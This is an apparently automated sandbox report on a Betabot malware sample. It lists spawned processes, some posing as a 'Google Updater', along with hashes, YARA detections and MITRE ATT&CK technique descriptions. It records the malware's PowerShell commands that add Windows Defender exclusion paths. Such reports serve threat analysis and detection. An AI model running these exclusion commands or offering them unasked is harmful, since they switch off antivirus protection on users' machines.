Start time:	11:42:15
Start date:	10/03/2021
Path:	C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe
Wow64 process (32bit):	true
Commandline:
Imagebase:	0x11c0000
File size:	909312 bytes
MD5 hash:	77276DDC82248473D033E2494C438A97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000014.00000002.544987662.0000000003BD0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Analysis Process: 9sek3aw7533q9.exe PID: 6616 Parent PID: 6576

General

Start time:	11:42:15
Start date:	10/03/2021
Path:	C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe
Wow64 process (32bit):	true
Commandline:	'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
Imagebase:	0x400000
File size:	852996 bytes
MD5 hash:	2CED2C14EECE71C72C5E45E8A607BB4C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000015.00000002.281228510.0000000002160000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: CpSHySoEfzH.exe PID: 2188 Parent PID: 3696

General

Start time:	11:42:16
Start date:	10/03/2021
Path:	C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe
Wow64 process (32bit):	true
Commandline:
Imagebase:	0x11c0000
File size:	909312 bytes
MD5 hash:	77276DDC82248473D033E2494C438A97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000017.00000002.544278949.0000000004060000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Analysis Process: CpSHySoEfzH.exe PID: 3332 Parent PID: 3696

General

Start time:	11:42:18
Start date:	10/03/2021
Path:	C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe
Wow64 process (32bit):	true
Commandline:
Imagebase:	0x11c0000
File size:	909312 bytes
MD5 hash:	77276DDC82248473D033E2494C438A97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000001A.00000002.556445822.0000000004470000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Analysis Process: CpSHySoEfzH.exe PID: 2036 Parent PID: 3696

General

Start time:	11:42:20
Start date:	10/03/2021
Path:	C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe
Wow64 process (32bit):	true
Commandline:
Imagebase:	0x11c0000
File size:	909312 bytes
MD5 hash:	77276DDC82248473D033E2494C438A97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000001D.00000002.526598639.0000000004000000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Analysis Process: 9sek3aw7533q9.exe PID: 6276 Parent PID: 3472

General

Start time:	11:42:22
Start date:	10/03/2021
Path:	C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe
Wow64 process (32bit):	true
Commandline:	'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
Imagebase:	0x400000
File size:	852996 bytes
MD5 hash:	2CED2C14EECE71C72C5E45E8A607BB4C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: 9sek3aw7533q9.exe PID: 5704 Parent PID: 6276

General

Start time:	11:42:23
Start date:	10/03/2021
Path:	C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe
Wow64 process (32bit):	true
Commandline:	'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
Imagebase:	0x400000
File size:	852996 bytes
MD5 hash:	2CED2C14EECE71C72C5E45E8A607BB4C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmp, Author: Joe Security

Analysis Process: 9sek3aw7533q9_1.exe PID: 6368 Parent PID: 3696

General

Start time:	11:42:27
Start date:	10/03/2021
Path:	C:\Users\user\AppData\Local\Temp\9sek3aw7533q9_1.exe
Wow64 process (32bit):	true
Commandline:	/suac
Imagebase:	0x400000
File size:	852996 bytes
MD5 hash:	2CED2C14EECE71C72C5E45E8A607BB4C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 40%, ReversingLabs

Analysis Process: iom7q73oi.exe PID: 6152 Parent PID: 3696

General

Start time:	11:42:29
Start date:	10/03/2021
Path:	C:\Users\user\AppData\Local\Temp\iom7q73oi.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\iom7q73oi.exe
Imagebase:	0x400000
File size:	45056 bytes
MD5 hash:	08CDFD0D3A406601C42F087DA16EC6C8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Antivirus matches:	Detection: 100%, Avira Detection: 21%, ReversingLabs

Analysis Process: 9sek3aw7533q9.exe PID: 5236 Parent PID: 3472

General

Start time:	11:42:30
Start date:	10/03/2021
Path:	C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe
Wow64 process (32bit):	true
Commandline:	'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
Imagebase:	0x400000
File size:	852996 bytes
MD5 hash:	2CED2C14EECE71C72C5E45E8A607BB4C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: powershell.exe PID: 5840 Parent PID: 6152

General

Start time:	11:42:31
Start date:	10/03/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\'
Imagebase:	0x7ff679040000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: powershell.exe PID: 4540 Parent PID: 6152

General

Start time:	11:42:32
Start date:	10/03/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\'
Imagebase:	0x7ff6bbfa0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Disassembly

Code Analysis

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.
Tactics:	Persistence, Privilege Escalation
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IEFO) debuggers. IEFOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., `C:\dbg\ntsd.exe -g notepad.exe` ).
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. Within MFT entries are file attributes, such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files).
Tactics:	Defense Evasion
Data Sources:	API monitoring, File monitoring, Process command-line parameters
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Documento--SII--33875.bin

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques.
Tactics:	Collection
Data Sources:	API monitoring, Authentication logs, Packet capture, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre